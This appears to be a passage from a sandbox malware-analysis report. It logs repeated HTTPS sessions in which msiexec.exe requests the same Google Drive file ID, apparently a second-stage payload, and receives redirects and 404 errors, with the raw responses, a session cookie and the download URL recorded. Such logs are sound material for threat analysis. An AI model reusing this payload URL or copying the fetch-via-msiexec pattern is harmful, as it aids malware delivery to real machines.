                                                          2025-01-11 00:31:02 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:02 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgS3ZLSNlNlnKfl0pjGD_qC3CfrXse2RqnidZDa8kmV5d0x1Yfuu2ss7FuK8M6kgXSyEVd3MCqE
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:02 GMT
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-Zplys3F-QrkR2Tf1UlJkmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:02 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 6f 4b 55 43 33 75 4f 4d 71 68 52 6c 6d 59 31 58 59 46 2d 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AoKUC3uOMqhRlmY1XYF-NQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          16 | 192.168.2.9 | 49990 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:03 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:04 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:04 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-w1o3PJ1dKjVCXRmk7vemNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          17 | 192.168.2.9 | 49991 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:04 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:05 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgR9CQUydRt0yrdvPr5FWKHkGSR-GLWkQ89J8Ox8wmvEcIMAmS9s4_6AaY1uJOz64NiuWda9PEw
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:05 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-OIFR1feHDQyeBLkAQrC_uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:05 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 33 55 31 49 56 79 76 36 51 68 59 4e 53 59 48 34 61 5a 67 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="f3U1IVyv6QhYNSYH4aZgRg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          18 | 192.168.2.9 | 49992 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:06 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:06 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:06 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-CVh3KqEmHbqnjmiasckPpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          19 | 192.168.2.9 | 49993 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:07 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:07 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgQT9toTjWgdKh6DxPjXPLaj2ECBITLb7s7I90xOek1ZbmdI8EMbi7G7dDfSAU4R3-NZqVHpi_g
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:07 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-nvJWdXTtaOYcBjlTwwqBNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:07 UTC | 1652              | IN        | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 69 58 69 41 30 46 76 32 46 32 4b 67 49 6c 48 32 6a 71 4b 78 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JiXiA0Fv2F2KgIlH2jqKxg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                          20         | 192.168.2.9 | 49994       | 142.250.184.206 | 443              | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp               | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:08 UTC | 417               | OUT       | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:08 UTC | 1920              | IN        | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:08 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-QmpRHxPjO8OPFvsfGJaGqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                          21         | 192.168.2.9 | 49995       | 142.250.181.225 | 443              | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp               | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:09 UTC | 459               | OUT       | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:09 UTC | 1844              | IN        | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgS-uvJDef7ImA_jWm2IJT3QhTXCjFVH8CZ5oH3flFotjfaLJlugKNQMfmEO5gybj_uc
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:09 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-naeiniOfAtBuiyOcB9hG6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:09 UTC | 1652              | IN        | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 69 73 36 72 57 66 77 6e 46 59 69 55 59 77 53 34 47 75 73 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ris6rWfwnFYiUYwS4Gus8g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                          22         | 192.168.2.9 | 49996       | 142.250.184.206 | 443              | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp               | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:10 UTC | 417               | OUT       | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:11 UTC | 1920              | IN        | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:10 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
